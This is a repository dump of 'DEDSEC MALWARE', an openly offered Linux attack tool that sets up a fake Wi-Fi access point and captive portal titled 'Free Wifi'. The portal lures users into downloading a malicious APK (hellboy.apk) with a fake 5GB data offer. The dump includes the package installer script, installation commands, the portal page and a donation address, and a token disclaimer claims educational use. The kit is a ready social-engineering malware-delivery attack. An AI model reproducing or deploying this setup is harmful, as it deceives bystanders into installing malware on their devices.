├── .www ├── logo.png ├── hellboy.apk └── index.php ├── packages.sh └── README.md /.www/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xbitx/dedsec-malware/HEAD/.www/logo.png -------------------------------------------------------------------------------- /.www/hellboy.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xbitx/dedsec-malware/HEAD/.www/hellboy.apk -------------------------------------------------------------------------------- /packages.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo -e "\n Installing required packages..." 4 | 5 | if [[ `command -v hostapd` && `command -v dnsmasq` ]]; then 6 | echo -e "\nPackages already installed." 7 | sleep 1 8 | 9 | else 10 | echo -e "\n Installing package : $pkg" 11 | 12 | if [[ `command -v apt` ]]; then 13 | apt install hostapd dnsmasq -y 14 | 15 | elif [[ `command -v apt-get` ]]; then 16 | apt-get install hostapd dnsmasq -y 17 | 18 | elif [[ `command -v pacman` ]]; then 19 | sudo pacman -S hostapd dnsmasq --noconfirm 20 | 21 | elif [[ `command -v dnf` ]]; then 22 | sudo dnf -y install hostapd dnsmasq 23 | 24 | else 25 | echo -e "\n Unsupported package manager, Install packages manually." 26 | { sleep 2; exit 1; } 27 | fi 28 | 29 | fi 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |

3 | 4 |

5 | 6 |

DEDSEC MALWARE

7 |

DEDSEC MALWARE is a Linux-based tool it can create fake access point and captive portal to deploy malware that it can be downloaded by the user for fake 5GB data.

8 | 9 | ### DESCRIPTION 10 | DEDSEC MALWARE, a Linux-based tool, employs deceptive access points and captive portals to distribute malware under the guise of offering a fake 5GB data incentive. Crafted by 0xbit, this tool capitalizes on social engineering, enticing users with seemingly attractive propositions to unwittingly download malicious software. In the ever-evolving landscape of cybersecurity threats, understanding and adopting robust security measures are imperative to counter such insidious tools. 11 | 12 | ### INSTALLATION 13 | * git clone https://github.com/0xbitx/dedsec-malware.git 14 | * cd dedsec-malware 15 | * chmod +x dedsec-malware 16 | * sudo ./dedsec-malware 17 | 18 | ### TESTED ON FOLLOWING 19 | * Kali Linux 20 | * Parrot OS 21 | * Ubuntu 22 | 23 | ### PREREQUISITES 24 | * sudo - [ MUST ] 25 | * wifi adapter support AP mode 26 | 27 | 28 | ## Support 29 | 30 | If you find my work helpful and want to support me, consider making a donation. Your contribution will help me continue working on open-source projects. 31 | 32 | **Bitcoin Address: `36ALguYpTgFF3RztL4h2uFb3cRMzQALAcm`** 33 | 34 | 35 |

DISCLAIMER

36 | 37 |

I'm not responsible for anything you do with this program, so please only use it for good and educational purposes.

38 | 39 | -------------------------------------------------------------------------------- /.www/index.php: -------------------------------------------------------------------------------- 1 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | Free Wifi 51 | 52 | 53 | 54 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 |
100 | 101 | 102 | 103 | 104 | 105 | 106 |

Welcome!

107 |

GET 5GB DATA

108 |

Download the app for access the wifi.

109 | 110 |
111 | 112 |

113 | 114 | Download App 115 | 116 |
117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 184 | --------------------------------------------------------------------------------